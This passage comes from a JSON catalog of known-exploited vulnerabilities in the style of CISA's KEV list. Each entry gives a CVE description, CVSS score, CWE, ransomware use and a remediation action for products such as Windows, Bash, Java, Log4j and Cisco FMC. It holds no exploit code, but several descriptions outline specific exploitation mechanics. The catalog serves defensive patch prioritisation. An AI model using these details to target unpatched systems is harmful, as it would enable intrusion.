kernel-mode driver in Microsoft Windows OS and Server allows local users to gain privileges via a crafted application.", "nvd_description": "The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 allows local users to gain privileges via a crafted application, aka \"Win32k Memory Corruption Elevation of Privilege Vulnerability,\" a different vulnerability than CVE-2015-2511, CVE-2015-2517, and CVE-2015-2518.", "cvss": "8.2 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "cwes": ["CWE-119"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2014-6278", "name": "GNU Bash OS Command Injection Vulnerability", "vendor": "GNU", "product": "GNU Bash", "kev_description": "GNU Bash contains an OS command injection vulnerability which allows remote attackers to execute arbitrary commands via a crafted environment.", "nvd_description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-78"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. "}, {"cve_id": "CVE-2013-0431", "name": "Oracle JRE Sandbox Bypass Vulnerability", "vendor": "Oracle", "product": "Java Runtime Environment (JRE)", "kev_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle allows remote attackers to bypass the Java security sandbox.", "nvd_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, and OpenJDK 7, allows user-assisted remote attackers to bypass the Java security sandbox via unspecified vectors related to JMX, aka \"Issue 52,\" a different vulnerability than CVE-2013-1490.", "cvss": "5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "cwes": ["CWE-693"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2012-4681", "name": "Oracle Java SE Runtime Environment (JRE) Arbitrary Code Execution Vulnerability", "vendor": "Oracle", "product": "Java SE", "kev_description": "The Java Runtime Environment (JRE) component in Oracle Java SE allow for remote code execution.", "nvd_description": "Multiple vulnerabilities in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allow remote attackers to execute arbitrary code via a crafted applet that bypasses SecurityManager restrictions by (1) using com.sun.beans.finder.ClassFinder.findClass and leveraging an exception with the forName method to access restricted classes from arbitrary packages such as sun.awt.SunToolkit, then (2) using \"reflection with a trusted immediate caller\" to leverage the getField method to access and modify private fields, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-284"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2011-4723", "name": "D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability", "vendor": "D-Link", "product": "DIR-300 Router", "kev_description": "The D-Link DIR-300 router stores cleartext passwords, which allows context-dependent attackers to obtain sensitive information.", "nvd_description": "The D-Link DIR-300 router stores cleartext passwords, which allows context-dependent attackers to obtain sensitive information via unspecified vectors.", "cvss": "5.7 MEDIUM CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-312"], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2010-0738", "name": "Red Hat JBoss Authentication Bypass Vulnerability", "vendor": "Red Hat", "product": "JBoss", "kev_description": "The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.", "nvd_description": "The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.", "cvss": "5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "cwes": ["CWE-749"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2009-1537", "name": "Microsoft DirectX NULL Byte Overwrite Vulnerability", "vendor": "Microsoft", "product": "DirectX", "kev_description": "Microsoft DirectX contains a NULL byte overwrite vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow which could allow remote attackers to execute arbitrary code via a crafted QuickTime media file.", "nvd_description": "Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka \"DirectX NULL Byte Overwrite Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-158"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2008-4250", "name": "Microsoft Windows Buffer Overflow Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows contains a buffer overflow vulnerability in the Windows Server Service that allows remote attackers to execute arbitrary code via a crafted RPC request that triggers an overflow during path canonicalization.", "nvd_description": "The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka \"Server Service Vulnerability.\"", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-119", "CWE-94"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2007-5659", "name": "Adobe Acrobat and Reader Buffer Overflow Vulnerability", "vendor": "Adobe", "product": "Acrobat and Reader", "kev_description": "Adobe Acrobat and Reader contain a buffer overflow vulnerability that allows remote attackers to execute code via a PDF file with long arguments to unspecified JavaScript methods.", "nvd_description": "Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-120"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2006-1547", "name": "Apache Struts 1 ActionForm Denial-of-Service Vulnerability", "vendor": "Apache", "product": "Struts 1", "kev_description": "ActionForm in Apache Struts versions before 1.2.9 with BeanUtils 1.7 contains a vulnerability that allows for denial-of-service (DoS).", "nvd_description": "ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "cwes": ["CWE-749"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2004-0210", "name": "Microsoft Windows Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "A privilege elevation vulnerability exists in the POSIX subsystem. This vulnerability could allow a logged on user to take complete control of the system.", "nvd_description": "The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-120"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-41940", "name": "WebPros cPanel & WHM and WP2 (WordPress Squared) Missing Authentication for Critical Function Vulnerability", "vendor": "WebPros", "product": "cPanel & WHM and WP2 (WordPress Squared)", "kev_description": "WebPros cPanel & WHM (WebHost Manager) and WP2 (WordPress Squared) contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.", "nvd_description": "cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-306"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-61884", "name": "Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability", "vendor": "Oracle", "product": "E-Business Suite", "kev_description": "Oracle E-Business Suite contains a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator. This vulnerability is remotely exploitable without authentication.", "nvd_description": "Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Configurator accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-22", "CWE-287", "CWE-444", "CWE-501", "CWE-918", "CWE-93"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2024-57726", "name": "SimpleHelp Missing Authorization Vulnerability", "vendor": "SimpleHelp ", "product": "SimpleHelp", "kev_description": "SimpleHelp contains a missing authorization vulnerability that could allow low-privileged technicians to create API keys with excessive permissions. These API keys can be used to escalate privileges to the server admin role.", "nvd_description": "SimpleHelp remote support software v5.5.7 and before has a vulnerability that allows low-privileges technicians to create API keys with excessive permissions. These API keys can be used to escalate privileges to the server admin role.", "cvss": "9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-862"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-48365", "name": "Qlik Sense HTTP Tunneling Vulnerability", "vendor": "Qlik", "product": "Sense", "kev_description": "Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.", "nvd_description": "Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, and November 2021 Patch 17. NOTE: this issue exists because of an incomplete fix for CVE-2023-41265.", "cvss": "9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "cwes": ["CWE-444"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-47986", "name": "IBM Aspera Faspex Code Execution Vulnerability", "vendor": "IBM", "product": "Aspera Faspex", "kev_description": "IBM Aspera Faspex could allow a remote attacker to execute code on the system, caused by a YAML deserialization flaw.", "nvd_description": "IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-502"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-45046", "name": "Apache Log4j2 Deserialization of Untrusted Data Vulnerability", "vendor": "Apache", "product": "Log4j2", "kev_description": "Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.", "nvd_description": "It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.", "cvss": "9.0 CRITICAL CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-917"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2020-3153", "name": "Cisco AnyConnect Secure Mobility Client for Windows Uncontrolled Search Path Vulnerability", "vendor": "Cisco", "product": "AnyConnect Secure", "kev_description": "Cisco AnyConnect Secure Mobility Client for Windows allows for incorrect handling of directory paths. An attacker with valid credentials on Windows would be able to copy malicious files to arbitrary locations with system level privileges. This could include DLL pre-loading, DLL hijacking, and other related attacks.", "nvd_description": "A vulnerability in the installer component of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated local attacker to copy user-supplied files to system level directories with system level privileges. The vulnerability is due to the incorrect handling of directory paths. An attacker could exploit this vulnerability by creating a malicious file and copying the file to a system directory. An exploit could allow the attacker to copy malicious files to arbitrary locations with system level privileges. This could include DLL pre-loading, DLL hijacking, and other related attacks. To exploit this vulnerability, the attacker needs valid credentials on the Windows system.", "cvss": "6.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "cwes": ["CWE-427"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-7195", "name": "QNAP Photo Station Path Traversal Vulnerability", "vendor": "QNAP", "product": "Photo Station", "kev_description": "QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.", "nvd_description": "This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-19322", "name": "GIGABYTE Multiple Products Code Execution Vulnerability", "vendor": "GIGABYTE", "product": "Multiple Products", "kev_description": "The GPCIDrv and GDrv low-level drivers in GIGABYTE App Center, AORUS Graphics Engine, XTREME Gaming Engine, and OC GURU II expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges.", "nvd_description": "The GPCIDrv and GDrv low-level drivers in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-749"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2017-7494", "name": "Samba Remote Code Execution Vulnerability", "vendor": "Samba", "product": "Samba", "kev_description": "Samba contains a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share and then cause the server to load and execute it.", "nvd_description": "Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2016-0151", "name": "Microsoft Windows CSRSS Security Feature Bypass Vulnerability", "vendor": "Microsoft", "product": "Client-Server Run-time Subsystem (CSRSS)", "kev_description": "The Client-Server Run-time Subsystem (CSRSS) in Microsoft mismanages process tokens, which allows local users to gain privileges via a crafted application.", "nvd_description": "The Client-Server Run-time Subsystem (CSRSS) in Microsoft Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 mismanages process tokens, which allows local users to gain privileges via a crafted application, aka \"Windows CSRSS Security Feature Bypass Vulnerability.\"", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-269"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2015-7645", "name": "Adobe Flash Player Arbitrary Code Execution Vulnerability", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player allows remote attackers to execute arbitrary code via a crafted SWF file.", "nvd_description": "Adobe Flash Player 18.x through 18.0.0.252 and 19.x through 19.0.0.207 on Windows and OS X and 11.x through 11.2.202.535 on Linux allows remote attackers to execute arbitrary code via a crafted SWF file, as exploited in the wild in October 2015.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2014-3931", "name": "Multi-Router Looking Glass (MRLG) Buffer Overflow Vulnerability", "vendor": "Looking Glass", "product": "Multi-Router Looking Glass (MRLG)", "kev_description": "Multi-Router Looking Glass (MRLG) contains a buffer overflow vulnerability that could allow remote attackers to cause an arbitrary memory write and memory corruption.", "nvd_description": "fastping.c in MRLG (aka Multi-Router Looking Glass) before 5.5.0 allows remote attackers to cause an arbitrary memory write and memory corruption.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-119"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2013-0422", "name": "Oracle JRE Remote Code Execution Vulnerability", "vendor": "Oracle", "product": "Java Runtime Environment (JRE)", "kev_description": "A vulnerability in the way Java restricts the permissions of Java applets could allow an attacker to execute commands on a vulnerable system.", "nvd_description": "Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object, then retrieving arbitrary Class references using the findClass method, and (2) using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API, as exploited in the wild in January 2013, as demonstrated by Blackhole and Nuclear Pack, and a different vulnerability than CVE-2012-4681 and CVE-2012-3174. NOTE: some parties have mapped the recursive Reflection API issue to CVE-2012-3174, but CVE-2012-3174 is for a different vulnerability whose details are not public as of 20130114. CVE-2013-0422 covers both the JMX/MBean and Reflection API issues. NOTE: it was originally reported that Java 6 was also vulnerable, but the reporter has retracted this claim, stating that Java 6 is not exploitable because the relevant code is called in a way that does not bypass security checks. NOTE: as of 20130114, a reliable third party has claimed that the findClass/MBeanInstantiator vector was not fixed in Oracle Java 7 Update 11. If there is still a vulnerable condition, then a separate CVE identifier might be created for the unfixed issue.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-284"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2012-1723", "name": "Oracle Java SE Runtime Environment (JRE) Arbitrary Code Execution Vulnerability", "vendor": "Oracle", "product": "Java SE", "kev_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE allows remote attackers to affect confidentiality, integrity, and availability via Unknown vectors related to Hotspot.", "nvd_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-284"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2011-1823", "name": "Android OS Privilege Escalation Vulnerability", "vendor": "Android", "product": "Android OS", "kev_description": "The vold volume manager daemon in Android kernel trusts messages from a PF_NETLINK socket, which allows an attacker to execute code and gain root privileges. This vulnerability is associated with GingerBreak and Exploit.AndroidOS.Lotoor.", "nvd_description": "The vold volume manager daemon on Android 3.0 and 2.x before 2.3.4 trusts messages that are received from a PF_NETLINK socket, which allows local users to execute arbitrary code and gain root privileges via a negative index that bypasses a maximum-only signed integer check in the DirectVolume::handlePartitionAdded method, which triggers memory corruption, as demonstrated by Gingerbreak.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-190"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2010-2861", "name": "Adobe ColdFusion Directory Traversal Vulnerability", "vendor": "Adobe", "product": "ColdFusion", "kev_description": "A directory traversal vulnerability exists in the administrator console in Adobe ColdFusion which allows remote attackers to read arbitrary files.", "nvd_description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2009-3459", "name": "Adobe Acrobat and Reader Heap-Based Buffer Overflow Vulnerability", "vendor": "Adobe", "product": "Acrobat and Reader", "kev_description": "Adobe Acrobat and Reader contain a heap-based buffer overflow vulnerability which could allow remote attackers to execute arbitrary code via a crafted PDF file that triggers memory corruption.", "nvd_description": "Heap-based buffer overflow in Adobe Reader and Acrobat 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2 allows remote attackers to execute arbitrary code via a crafted PDF file that triggers memory corruption, as exploited in the wild in October 2009. NOTE: some of these details are obtained from third party information.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-119", "CWE-122"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2008-0015", "name": " Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows Video ActiveX Control contains a remote code execution vulnerability. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.", "nvd_description": "Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka \"Microsoft Video ActiveX Control Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-119", "CWE-121"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2007-3010", "name": "Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability", "vendor": "Alcatel", "product": "OmniPCX Enterprise", "kev_description": "masterCGI in the Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server allows remote attackers to execute arbitrary commands.", "nvd_description": "masterCGI in the Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server R7.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the user parameter during a ping action.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-77"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-20131", "name": "Cisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management Deserialization of Untrusted Data Vulnerability", "vendor": "Cisco", "product": "Secure Firewall Management Center (FMC)", "kev_description": "Cisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management contain a deserialization of untrusted data vulnerability in the web-based management interface that could allow an unauthenticated, remote attacker to execute arbitrary Java code as root on an affected device.", "nvd_description": "A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to execute arbitrary Java code as root on an affected device.\r\n\r\nThis vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root.\r\nNote: If the FMC management interface does not have public internet access, the attack surface that is associated with this vulnerability is reduced.", "cvss": "10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-502"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-61882", "name": "Oracle E-Business Suite Unspecified Vulnerability", "vendor": "Oracle", "product": "E-Business Suite", "kev_description": "Oracle E-Business Suite contains an unspecified vulnerability in the BI Publisher Integration component. The vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks can result in takeover of Oracle Concurrent Processing.", "nvd_description": "Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-287"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2024-27199", "name": "JetBrains TeamCity Relative Path Traversal Vulnerability", "vendor": "JetBrains", "product": "TeamCity", "kev_description": "JetBrains TeamCity contains a relative path traversal vulnerability that could allow limited admin actions to be performed.", "nvd_description": "In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible", "cvss": "7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "cwes": ["CWE-22", "CWE-23"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-28461", "name": "Array Networks AG and vxAG ArrayOS Missing Authentication for Critical Function Vulnerability", "vendor": "Array Networks ", "product": "AG/vxAG ArrayOS", "kev_description": "Array Networks AG and vxAG ArrayOS contain a missing authentication for critical function vulnerability that allows an attacker to read local files and execute code on the 